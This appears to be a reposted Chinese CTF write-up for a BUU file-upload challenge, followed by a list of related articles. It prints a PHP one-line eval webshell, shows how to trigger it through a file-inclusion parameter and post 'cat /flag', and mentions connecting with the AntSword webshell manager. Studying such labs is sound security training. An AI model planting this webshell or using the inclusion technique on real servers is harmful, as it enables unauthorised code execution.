当前位置: 首页 > article >正文

BUU UPLOAD COURSE 1

image.png
进去之后是一个上传页面
image.png
尝试上传一句话木马的php代码,保存为一个1.php,然后上传

<?php eval($_POST[1]);?>

image.png
发现后缀名被改为jpg了
访问一下

http://a82bcc09-b809-42c9-b5ad-5406b72e5707.node5.buuoj.cn:81/uploads/65bfa77eab1f6.jpg

发现可以预览,但是执行不了木马的代码
image.png
image.png

  • 状态码 405 Method Not Allowed 表明服务器禁止了使用当前 HTTP 方法的请求。

查看大佬博客(https://www.cnblogs.com/zhwyyswdg/p/14076413.html)发现是说上传之后 不能直接访问xxx/uploads/xxxxx.jpg 那样只是预览这个文件 而起不到调用这个文件的作用
只有服务器解析了php代码,我们的木马才算成功执行了

发现可以直接在index首页的file参数直接带上/uploads/xxxxx.jpg就可以执行代码了
构造payload:

http://a82bcc09-b809-42c9-b5ad-5406b72e5707.node5.buuoj.cn:81/index.php?file=uploads/65bfa77eab1f6.jpg

然后post传参
1=cat /flag 就可以获得flag

或者:
用蚁剑等webshell 管理工具连接
先访问该php木马的地址,让浏览器(服务器)对它解析,这样我们才能利用
image.png
然后蚁剑连接
image.png
在根目录发现flag
image.png
image.png
或者开虚拟终端看
image.png
image.png


http://www.kler.cn/a/228623.html

相关文章:

  • Python新春烟花
  • JS宏进阶:正则表达式介绍
  • 【LeetCode: 215. 数组中的第K个最大元素 + 快速选择排序】
  • 回归算法、聚类算法、决策树、随机森林、神经网络
  • JSON-stringify和parse
  • 蓝桥杯训练—矩形面积交
  • PHP框架详解 - symfony框架
  • 备战蓝桥杯---数据结构与STL应用(进阶2)
  • 【Redis】实现缓存及相关问题
  • 网络安全-端口扫描和服务识别的几种方式
  • WPF DataTemplate内重写BorderBrush,VisualBrush内数据源绑定提示绑定失败
  • 数据挖掘实战-基于决策树算法构建北京市空气质量预测模型
  • 前端excel带样式导出 exceljs 插件的使用
  • C语言动态库全面深入剖析
  • [office] 在Excel2010中设定某些单元格数据不参与排序的方法介绍 #其他#知识分享#笔记
  • golang 创建unix socket http服务端
  • 如何使用linux inotifywait inotifywatch对文件增删修改进行监测和实现数据同步
  • 最短编辑距离问题与动态规划----LeetCode 72.编辑距离
  • Linux底层基础知识
  • 回归预测 | Matlab实现WOA-CNN-LSTM-Attention鲸鱼算法优化卷积长短期记忆网络注意力多变量回归预测(SE注意力机制)
  • Go语言学习踩坑记
  • golang开发window环境搭建
  • 【工具】使用asciidoctor-pdf将adoc文件转换成pdf
  • 回归预测 | Matlab实现OOA-CNN-LSTM-Attention鱼鹰算法优化卷积长短期记忆网络注意力多变量回归预测(SE注意力机制)
  • 5G智能卷烟工厂数字孪生可视化平台,推进烟草行业数字化转型
  • 贪心算法篇